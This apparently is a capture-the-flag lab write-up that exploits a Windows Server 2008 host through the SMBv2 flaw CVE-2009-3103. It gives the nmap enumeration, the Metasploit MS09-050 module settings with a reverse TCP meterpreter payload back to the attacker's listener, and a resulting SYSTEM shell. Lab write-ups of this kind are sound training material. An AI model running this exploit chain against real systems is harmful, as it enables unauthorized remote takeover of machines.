Internal - OSPG
Read this in "about 3 minutes".
Summary
In this writeup, we’ll exploit the vulnerable SMB service, which yields us Unauthenticated Remote Code Execution and successfully compromise the SYSTEM access.
Enumeration
Nmap
We’ll begin with a nmap scan.
$ sudo nmap -p- -sV -T4 192.168.130.40
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.0.6001 (17714650) (Windows Server 2008 SP1)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 microsoft-ds (workgroup: WORKGROUP)
763/tcp filtered cycleserv
1147/tcp filtered capioverlan
3389/tcp open ssl/ms-wbt-server?
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
...
Let’s us further inspecting the SMB version by employing a vulnerability scanner against the service.
$ sudo nmap --script smb-vuln\* -p445 192.168.130.40
Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-06 21:14 AEST
Verbosity Increased to 1.
Completed NSE at 21:15, 60.65s elapsed
Nmap scan report for 192.168.130.40
Host is up (0.32s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
| smb-vuln-cve2009-3103:
| VULNERABLE:
| SMBv2 exploit (CVE-2009-3103, Microsoft Security Advisory 975497)
| State: VULNERABLE
| IDs: CVE:CVE-2009-3103
| Array index error in the SMBv2 protocol implementation in srv2.sys in Microsoft Windows Vista Gold, SP1, and SP2,
| Windows Server 2008 Gold and SP2, and Windows 7 RC allows remote attackers to execute arbitrary code or cause a
| denial of service (system crash) via an & (ampersand) character in a Process ID High header field in a NEGOTIATE
| PROTOCOL REQUEST packet, which triggers an attempted dereference of an out-of-bounds memory location,
| aka "SMBv2 Negotiation Vulnerability."
|
| Disclosure date: 2009-09-08
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_ http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: TIMEOUT
Conducting a few more researches, we discover the exploit can be found here and exploitable via Metasploit framework.
Exploitation
MS09-050 RCE
Within our Metasploit console, we search and use the windows/smb/ms09_050_smb2_negotiate_func_index module.
Here is an example of the module configurations.
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > options
Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.130.40 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
WAIT 180 yes The number of seconds to wait for the attack to complete.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST tun0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)
After everything is lined up, we can throw our exploit.
msf6 exploit(windows/smb/ms09_050_smb2_negotiate_func_index) > exploit
[*] Started reverse TCP handler on 192.168.49.130:4444
[*] 192.168.130.40:445 - Connecting to the target (192.168.130.40:445)...
[*] 192.168.130.40:445 - Sending the exploit packet (951 bytes)...
[*] 192.168.130.40:445 - Waiting up to 180 seconds for exploit to trigger...
[*] Sending stage (175174 bytes) to 192.168.130.40
[*] Meterpreter session 1 opened (192.168.49.130:4444 -> 192.168.130.40:49159) at 2021-09-06 21:20:32 +1000
meterpreter > shell
Process 3672 created.
Channel 1 created.
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Privilege escalation is trivial since we are already nt authority\system on the system!.